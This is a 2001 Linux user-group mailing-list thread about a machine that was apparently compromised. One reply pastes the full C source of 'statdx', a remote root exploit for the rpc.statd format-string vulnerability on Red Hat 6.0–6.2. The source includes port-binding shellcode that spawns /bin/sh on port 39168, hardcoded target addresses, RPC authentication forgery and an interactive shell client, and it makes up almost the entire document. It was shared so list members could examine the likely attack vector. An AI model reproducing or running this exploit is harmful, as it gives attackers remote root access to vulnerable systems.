cdowns wrote:

> "Karl J. Runge" wrote:
>
> > On Mon, 19 Feb 2001, "Robert W. Fowler" <[EMAIL PROTECTED]> wrote:
> > >
> > > i think one of our machines got nailed just This morning with a
> > > suspected named exploit....
> > > i can post any info that ive found if anyone would like to examine it,
> > > im still sifting through it myself.
> > > Time to  Wipe the disk
> > > Rob
> >
> > Is the exploit connection TCP only, UDP only, or involves both?
> >
> > Thanks,
> >
> > Karl
> >
> > **********************************************************
> > To unsubscribe from this list, send mail to
> > [EMAIL PROTECTED] with the following text in the
> > *body* (*not* the subject line) of the letter:
> > unsubscribe gnhlug
> > **********************************************************
>
> the exploit most likely used was statdx.c here is the source :
>
> -D
>
> /**
> *** statdx
> *** Redhat Linux 6.0/6.1/6.2 rpc.statd remote root exploit (IA32)
> *** by ron1n <[EMAIL PROTECTED]>
> ***
> *** August 3, 2000
> *** Sydney, Australia
> ***
> *** Oh you prob'ly won't remember me
> *** It's prob'ly ancient history
> *** I'm one of the chosen few
> *** Who went ahead and fell for you
> ***
> *** $ gcc -o statdx statdx.c ; ./statdx -h
> ***
> *** Thanks to smiler for the format string vulnerability clarification.
> ***
> *** background info
> *** ---------------
> *** rpc.statd is an ONC RPC server that implements the Network Status
> *** Monitor RPC protocol to provide reboot notification. It is used by
> *** the NFS file locking service (rpc.lockd) when it performs lock
> *** recovery.
> ***
> *** Due to a format string vulnerability in a call to syslog() within
> *** its logging module, rpc.statd can be exploited remotely by script
> *** kids bent on breaking into your Redhat Linux box and defacing your
> *** website with crackpot political musings.
> ***
> *** This is not a traditional buffer overflow vulnerability. The data
> *** are kept within the bounds of the buffer by means of a call to
> *** vsnprintf(). The saved return address can be overwritten indirectly
> *** without a contiguous payload. syslog() is given, for the most part,
> *** a user-supplied format string with no process-supplied arguments.
> *** Our format string will, if carefully constructed, cause the process
> *** to cull non-arbitrary addresses from the top of the stack for
> *** sequential writes using controlled values. Exploitation requires
> *** an executable stack on the target host -- almost invariably the
> *** case. This problem was corrected in the nfs-utils-0.1.9.1 rpm.
> ***
> *** exploit info
> *** ------------
> *** You have one shot at this in most situations, so get it right!
> ***
> *** If you know the port number rpc.statd is serving requests on, you
> *** can supply the port number on the commandline to bypass the initial
> *** portmapper query. This is very useful for hosts which are filtering
> *** inbound connections to the portmapper. The default attack protocol
> *** is UDP. There is a commandline option to use TCP. Apparently, the
> *** dispatcher uses both protocols by default.
> ***
> *** If you're only interested in exploiting a host, then you can safely
> *** skip the following information. You'll only need a buffer address
> *** to get started. This buffer address will either be one of my canned
> *** ones or your own one. It must be precise, and this is where you're
> *** likely to experience difficulties with your attacks.
> ***
> *** [va_list][str][4][r][4][r+1][4][r+2][4][r+3]----->
> *** |       |
> *** %esp    buffer[1024]
> ***
> *** [%8x..][%!x][%n][%!x][%n][%!x][%n][%!x][%n][sc]--->
> ***        |   r   |   r+1  |   r+2  |  r+3   |
> ***
> *** buffer  ->  This is the address you'll need (-a and -l options)
> *** str     ->  Process-supplied string; 24 bytes long
> *** 4       ->  Duplicate dwords to satisfy the %!d specifiers and
> ***             the double %n when two successive values are equal
> *** r       ->  Stack position of saved eip
> *** %8x..   ->  Wipes the va_list dword and str; 9 by default (-w option)
> *** %!x     ->  Used for padding to form an aggregate overwrite value;
> ***             the exclamation mark denotes a field width. This may
> ***             or may not be present, depending on the value. An
> ***             algorithm is used to allow tricky values.
> *** %n      ->  Writes overwrite value to the corresponding address
> *** sc      ->  Nops + portbinding shellcode (port 39168)
> ***
> *** Only modify the default wipe value and the default offset value if you
> *** know what you're doing.
> ***
> *** An easy way to get the buffer address for simulation systems that you
> *** have privileged access to:
> ***
> *** [term 1]# ltrace -p `pidof rpc.statd` -o foo
> *** [term 2]$ ./statdx -a 0x41414141 localhost
> *** [term 1]# grep vsnprintf foo | head -1 | sed 's/.*(//' | \
> ***          awk -F"," '{print $1}'
> ***
> *** (Of course, ensure that rpc.statd is started at boot time and not from
> *** an interactive shell, otherwise it will inherit a larger environment
> *** and blow the accuracy of your findings.)
> ***
> *** Ok, longwinded enough. Let's dance.
> ***
> *** greets
> *** ------
> *** ADM, attrition, rogues, security.is, teso
> ***
> **/
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <errno.h>
> #include <unistd.h>
> #include <netdb.h>
> #include <rpc/rpc.h>
> #include <sys/types.h>
> #include <sys/time.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
>
> #define SM_PROG 100024
> #define SM_VERS 1
> #define SM_STAT 1
> #define SM_MAXSTRLEN 1024
>
> #define max(a,b) ((a)>(b)?(a):(b))
>
> #define NOP 0x90
>
> /*
> ** Non-ripped linux IA32 portbinding shellcode.
> ** port: 39168 ; length: 133 bytes
> */
>
> char shellcode[] =
> "\x31\xc0"                              /* xorl   %eax,%eax             */
> /* jmp ricochet ------------------------------------------------------- */
> "\xeb\x7c"                              /* jmp    0x7c                  */
> /* kungfu: ------------------------------------------------------------ */
> "\x59"                                  /* popl   %ecx                  */
> "\x89\x41\x10"                          /* movl   %eax,0x10(%ecx)       */
> /* ------------------------------------ socket(2,1,0); ---------------- */
> "\x89\x41\x08"                          /* movl   %eax,0x8(%ecx)        */
> "\xfe\xc0"                              /* incb   %al                   */
> "\x89\x41\x04"                          /* movl   %eax,0x4(%ecx)        */
> "\x89\xc3"                              /* movl   %eax,%ebx             */
> "\xfe\xc0"                              /* incb   %al                   */
> "\x89\x01"                              /* movl   %eax,(%ecx)           */
> "\xb0\x66"                              /* movb   $0x66,%al             */
> "\xcd\x80"                              /* int    $0x80                 */
> /* ------------------------------------ bind(sd,&sockaddr,16); -------- */
> "\xb3\x02"                              /* movb   $0x2,%bl              */
> "\x89\x59\x0c"                          /* movl   %ebx,0xc(%ecx)        */
> "\xc6\x41\x0e\x99"                      /* movb   $0x99,0xe(%ecx)       */
> "\xc6\x41\x08\x10"                      /* movb   $0x10,0x8(%ecx)       */
> "\x89\x49\x04"                          /* movl   %ecx,0x4(%ecx)        */
> "\x80\x41\x04\x0c"                      /* addb   $0xc,0x4(%ecx)        */
> "\x88\x01"                              /* movb   %al,(%ecx)            */
> "\xb0\x66"                              /* movb   $0x66,%al             */
> "\xcd\x80"                              /* int    $0x80                 */
> /* ------------------------------------ listen(sd,blah); -------------- */
> "\xb3\x04"                              /* movb   $0x4,%bl              */
> "\xb0\x66"                              /* movb   $0x66,%al             */
> "\xcd\x80"                              /* int    $0x80                 */
> /* ------------------------------------ accept(sd,0,16); -------------- */
> "\xb3\x05"                              /* movb   $0x5,%bl              */
> "\x30\xc0"                              /* xorb   %al,%al               */
> "\x88\x41\x04"                          /* movb   %al,0x4(%ecx)         */
> "\xb0\x66"                              /* movb   $0x66,%al             */
> "\xcd\x80"                              /* int    $0x80                 */
> /* ------------------------------------ dup2(cd,0); ------------------- */
> "\x89\xce"                              /* movl   %ecx,%esi             */
> "\x88\xc3"                              /* movb   %al,%bl               */
> "\x31\xc9"                              /* xorl   %ecx,%ecx             */
> "\xb0\x3f"                              /* movb   $0x3f,%al             */
> "\xcd\x80"                              /* int    $0x80                 */
> /* ------------------------------------ dup2(cd,1); ------------------- */
> "\xfe\xc1"                              /* incb   %cl                   */
> "\xb0\x3f"                              /* movb   $0x3f,%al             */
> "\xcd\x80"                              /* int    $0x80                 */
> /* ------------------------------------ dup2(cd,2); ------------------- */
> "\xfe\xc1"                              /* incb   %cl                   */
> "\xb0\x3f"                              /* movb   $0x3f,%al             */
> "\xcd\x80"                              /* int    $0x80                 */
> /* ------------------------------------ execve("/bin/sh",argv,0); ----- */
> "\xc7\x06\x2f\x62\x69\x6e"              /* movl   $0x6e69622f,(%esi)    */
> "\xc7\x46\x04\x2f\x73\x68\x41"          /* movl   $0x4168732f,0x4(%esi) */
> "\x30\xc0"                              /* xorb   %al,%al               */
> "\x88\x46\x07"                          /* movb   %al,0x7(%esi)         */
> "\x89\x76\x0c"                          /* movl   %esi,0xc(%esi)        */
> "\x8d\x56\x10"                          /* leal   0x10(%esi),%edx       */
> "\x8d\x4e\x0c"                          /* leal   0xc(%esi),%ecx        */
> "\x89\xf3"                              /* movl   %esi,%ebx             */
> "\xb0\x0b"                              /* movb   $0xb,%al              */
> "\xcd\x80"                              /* int    $0x80                 */
> /* ------------------------------------ exit(blah); ------------------- */
> "\xb0\x01"                              /* movb   $0x1,%al              */
> "\xcd\x80"                              /* int    $0x80                 */
> /* ricochet: call kungfu ---------------------------------------------- */
> "\xe8\x7f\xff\xff\xff";                 /* call   -0x81                 */
>
> enum res
> {
>     stat_succ,
>     stat_fail
> };
>
> struct sm_name
> {
>     char *mon_name;
> };
>
> struct sm_stat_res
> {
>     enum res res_stat;
>     int state;
> };
>
> struct type
> {
>     int type;
>     char *desc;
>     char *code;
>     u_long bufpos;
>     int buflen;
>     int offset;
>     int wipe;
> };
>
> struct type types[] =
> {
>     {0, "Redhat 6.2 (nfs-utils-0.1.6-2)", shellcode, 0xbffff314, 1024, 600,
> 9},
>     {1, "Redhat 6.1 (knfsd-1.4.7-7)", shellcode, 0xbffff314, 1024, 600, 9},
>
>     {2, "Redhat 6.0 (knfsd-1.2.2-4)", shellcode, 0xbffff314, 1024, 600, 9},
>
>     {0, NULL, NULL, 0, 0, 0, 0}
> };
>
> bool_t
> xdr_sm_name(XDR *xdrs, struct sm_name *objp)
> {
>     if (!xdr_string(xdrs, &objp->mon_name, SM_MAXSTRLEN))
>         return (FALSE);
>     return (TRUE);
> }
>
> bool_t
> xdr_res(XDR *xdrs, enum res *objp)
> {
>     if (!xdr_enum(xdrs, (enum_t *)objp))
>         return (FALSE);
>     return (TRUE);
> }
>
> bool_t
> xdr_sm_stat_res(XDR *xdrs, struct sm_stat_res *objp)
> {
>     if (!xdr_res(xdrs, &objp->res_stat))
>         return (FALSE);
>     if (!xdr_int(xdrs, &objp->state))
>         return (FALSE);
>     return (TRUE);
> }
>
> void
> usage(char *app)
> {
>     int i;
>
>     fprintf(stderr, "statdx by ron1n <[EMAIL PROTECTED]>\n");
>     fprintf(stderr, "Usage: %s [-t] [-p port] [-a addr] [-l len]\n", app);
>     fprintf(stderr, "\t[-o offset] [-w num] [-s secs] [-d type]
> <target>\n");
>     fprintf(stderr, "-t\tattack a tcp dispatcher [udp]\n");
>     fprintf(stderr, "-p\trpc.statd serves requests on <port> [query]\n");
>     fprintf(stderr, "-a\tthe stack address of the buffer is <addr>\n");
>     fprintf(stderr, "-l\tthe length of the buffer is <len> [1024]\n");
>     fprintf(stderr, "-o\tthe offset to return to is <offset> [600]\n");
>     fprintf(stderr, "-w\tthe number of dwords to wipe is <num> [9]\n");
>     fprintf(stderr, "-s\tset timeout in seconds to <secs> [5]\n");
>     fprintf(stderr, "-d\tuse a hardcoded <type>\n");
>     fprintf(stderr, "Available types:\n");
>
>     for(i = 0; types[i].desc; i++)
>         fprintf(stderr, "%d\t%s\n", types[i].type, types[i].desc);
>
>     exit(EXIT_FAILURE);
> }
>
> void
> runshell(int sockd)
> {
>     char buff[1024];
>     int fmax, ret;
>     fd_set fds;
>
>     fmax = max(fileno(stdin), sockd) + 1;
>     send(sockd, "cd /; ls -alF; id;\n", 19, 0);
>
>     for(;;)
>     {
>
>         FD_ZERO(&fds);
>         FD_SET(fileno(stdin), &fds);
>         FD_SET(sockd, &fds);
>
>         if(select(fmax, &fds, NULL, NULL, NULL) < 0)
>         {
>             perror("select()");
>             exit(EXIT_FAILURE);
>         }
>
>         if(FD_ISSET(sockd, &fds))
>         {
>             bzero(buff, sizeof buff);
>             if((ret = recv(sockd, buff, sizeof buff, 0)) < 0)
>             {
>                 perror("recv()");
>                 exit(EXIT_FAILURE);
>             }
>             if(!ret)
>             {
>                 fprintf(stderr, "Connection closed\n");
>                 exit(EXIT_FAILURE);
>             }
>             write(fileno(stdout), buff, ret);
>         }
>
>         if(FD_ISSET(fileno(stdin), &fds))
>         {
>             bzero(buff, sizeof buff);
>             ret = read(fileno(stdin), buff, sizeof buff);
>             errno = 0;
>             if(send(sockd, buff, ret, 0) != ret)
>             {
>                 if(errno) perror("send()");
>                 else fprintf(stderr, "Transmission loss\n");
>                 exit(EXIT_FAILURE);
>             }
>         }
>     }
> }
>
> void
> connection(struct sockaddr_in host)
> {
>     int sockd;
>
>     host.sin_port = htons(39168);
>
>     if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
>     {
>         perror("socket()");
>         exit(EXIT_FAILURE);
>     }
>
>     if(!connect(sockd, (struct sockaddr *) &host, sizeof host))
>     {
>         printf("OMG! You now have rpc.statd technique!@#$!\n");
>         runshell(sockd);
>     }
>
>     close(sockd);
> }
>
> char *
> wizardry(char *sc, u_long bufpos, int buflen, int offset, int wipe)
> {
>     int i, j, cnt, pad;
>     char pbyte, *buff, *ptr;
>     u_long retpos;
>     u_long dstpos;
>
>     while(bufpos % 4) bufpos--;
>     /* buflen + ebp */
>     retpos = bufpos + buflen + 4;
>
> /*
> ** 0x00 == '\0'
> ** 0x25 == '%'
> ** (add troublesome bytes)
> ** Alignment requirements aid comparisons
> */
>
>     pbyte = retpos & 0xff;
>
>     /* Yes, it's 0x24 */
>     if(pbyte == 0x00 || pbyte == 0x24)
>     {
>         fprintf(stderr, "Target address space contains a poison char\n");
>         exit(EXIT_FAILURE);
>     }
>
> /*
> ** Unless the user gives us a psychotic value,
> ** the address should now be clean.
> */
>
>     /* str */
>     cnt = 24;
>     /* 1 = process nul */
>     buflen -= cnt + 1;
>
>     if(!(buff = malloc(buflen + 1)))
>     {
>         perror("malloc()");
>         exit(EXIT_FAILURE);
>     }
>
>     ptr = buff;
>     memset(ptr, NOP, buflen);
>
>     for(i = 0; i < 4; i++, retpos++)
>     {
>         /* junk dword */
>         for(j = 0; j < 4; j++)
>             *ptr++ = retpos >> j * 8 & 0xff;
>         /* r + i */
>         memcpy(ptr, ptr - 4, 4);
>         ptr += 4; cnt += 8;
>     }
>
>     /* restore */
>     retpos -= 4;
>
>     for(i = 0; i < wipe; i++)
>     {
>         /* consistent calculations */
>         strncpy(ptr, "%8x", 3);
>         ptr += 3; cnt += 8;
>     }
>
>     dstpos = bufpos + offset;
>
> /*
> ** This small algorithm of mine can be used
> ** to obtain "difficult" values..
> */
>
>     for(i = 0; i < 4; i++)
>     {
>         pad = dstpos >> i * 8 & 0xff;
>         if(pad == (cnt & 0xff))
>         {
>             sprintf(ptr, "%%n%%n");
>             ptr += 4; continue;
>         }
>         else
>         {
>             int tmp;
>             /* 0xffffffff = display count of 8 */
>             while(pad < cnt || pad % cnt <= 8) pad += 0x100;
>             pad -= cnt, cnt += pad;
>             /* the source of this evil */
>             tmp = sprintf(ptr, "%%%dx%%n", pad);
>             ptr += tmp;
>         }
>
>     }
>
>     *ptr = NOP;
>     /* plug in the shellcode */
>     memcpy(buff + buflen - strlen(sc), sc, strlen(sc));
>     buff[buflen] = '\0';
>
>     printf("buffer: %#lx length: %d (+str/+nul)\n", bufpos, strlen(buff));
>     printf("target: %#lx new: %#lx (offset: %d)\n", retpos, dstpos,
> offset);
>     printf("wiping %d dwords\n", wipe);
>     return buff;
> }
>
> struct in_addr
> getip(char *host)
> {
>     struct hostent *hs;
>
>     if((hs = gethostbyname(host)) == NULL)
>     {
>         herror("gethostbyname()");
>         exit(EXIT_FAILURE);
>     }
>
>     return *((struct in_addr *) hs->h_addr);
> }
>
> int
> main(int argc, char **argv)
> {
>     int ch;
>     char *buff;
>
>     CLIENT *clnt;
>     enum clnt_stat res;
>     struct timeval tv, tvr;
>     struct sm_name smname;
>     struct sm_stat_res smres;
>     struct sockaddr_in addr;
>
>     int type = -1;
>     int usetcp = 0;
>     int timeout = 5;
>     int wipe = 9;
>     int offset = 600;
>     int buflen = 1024;
>     char *target;
>     char *sc = shellcode;
>     u_short port = 0;
>     u_long bufpos = 0;
>
>     int sockp = RPC_ANYSOCK;
>
>     extern char *optarg;
>     extern int optind;
>     extern int opterr;
>     opterr = 0;
>
>     while((ch = getopt(argc, argv, "tp:a:l:o:w:s:d:")) != -1)
>     {
>         switch(ch)
>         {
>             case 't': usetcp = 1; break;
>             case 'p': sscanf(optarg, "%hu", &port); break;
>             case 'a': sscanf(optarg, "%lx", &bufpos); break;
>             case 'l': buflen = atoi(optarg); break;
>             case 'o': offset = atoi(optarg); break;
>             case 's': timeout = atoi(optarg); break;
>             case 'w': wipe = atoi(optarg); break;
>             case 'd': type = atoi(optarg); break;
>             default : usage(argv[0]);
>         }
>     }
>
>     if(!(target = argv[optind]))
>     {
>         fprintf(stderr, "No target host specified\n");
>         exit(EXIT_FAILURE);
>     }
>
>     if(type >= 0)
>     {
>         if(type >= sizeof types / sizeof types[0] - 1)
>         {
>             fprintf(stderr, "Invalid type\n");
>             exit(EXIT_FAILURE);
>         }
>
>         sc = types[type].code;
>         bufpos = types[type].bufpos;
>         buflen = types[type].buflen;
>         offset = types[type].offset;
>         wipe = types[type].wipe;
>     }
>
>     if(!bufpos)
>     {
>         fprintf(stderr, "No buffer address specified\n");
>         exit(EXIT_FAILURE);
>     }
>
>     bzero(&addr, sizeof addr);
>     addr.sin_family = AF_INET;
>     addr.sin_port = htons(port);
>     addr.sin_addr = getip(target);
>
>     tv.tv_sec = timeout;
>     tv.tv_usec = 0;
>
>     if(!usetcp)
>     {
>         clnt = clntudp_create(&addr, SM_PROG, SM_VERS, tv, &sockp);
>         if(clnt == NULL)
>         {
>             clnt_pcreateerror("clntudp_create()");
>             exit(EXIT_FAILURE);
>         }
>         tvr.tv_sec = 2;
>         tvr.tv_usec = 0;
>         clnt_control(clnt, CLSET_RETRY_TIMEOUT, (char *) &tvr);
>     }
>     else
>     {
>         clnt = clnttcp_create(&addr, SM_PROG, SM_VERS, &sockp, 0, 0);
>         if(clnt == NULL)
>         {
>             clnt_pcreateerror("clnttcp_create()");
>             exit(EXIT_FAILURE);
>         }
>     }
>
>     /* AUTH_UNIX / AUTH_SYS authentication forgery */
>     clnt->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
>
>     buff = wizardry(sc, bufpos, buflen, offset, wipe);
>     smname.mon_name = buff;
>
>     res = clnt_call(clnt, SM_STAT, (xdrproc_t) xdr_sm_name,
>         (caddr_t) &smname, (xdrproc_t) xdr_sm_stat_res,
>         (caddr_t) &smres, tv);
>
>     if(res != RPC_SUCCESS)
>     {
>         clnt_perror(clnt, "clnt_call()");
>         printf("A timeout was expected. Attempting connection to
> shell..\n");
>         sleep(5); connection(addr);
>         printf("Failed\n");
>     }
>     else
>     {
>         printf("Failed - statd returned res_stat: (%s) state: %d\n",
>                 smres.res_stat ? "failure" : "success", smres.state);
>     }
>
>     free(buff);
>     clnt_destroy(clnt);
>     return -1;
> }


**********************************************************
To unsubscribe from this list, send mail to
[EMAIL PROTECTED] with the following text in the
*body* (*not* the subject line) of the letter:
unsubscribe gnhlug
**********************************************************

Reply via email to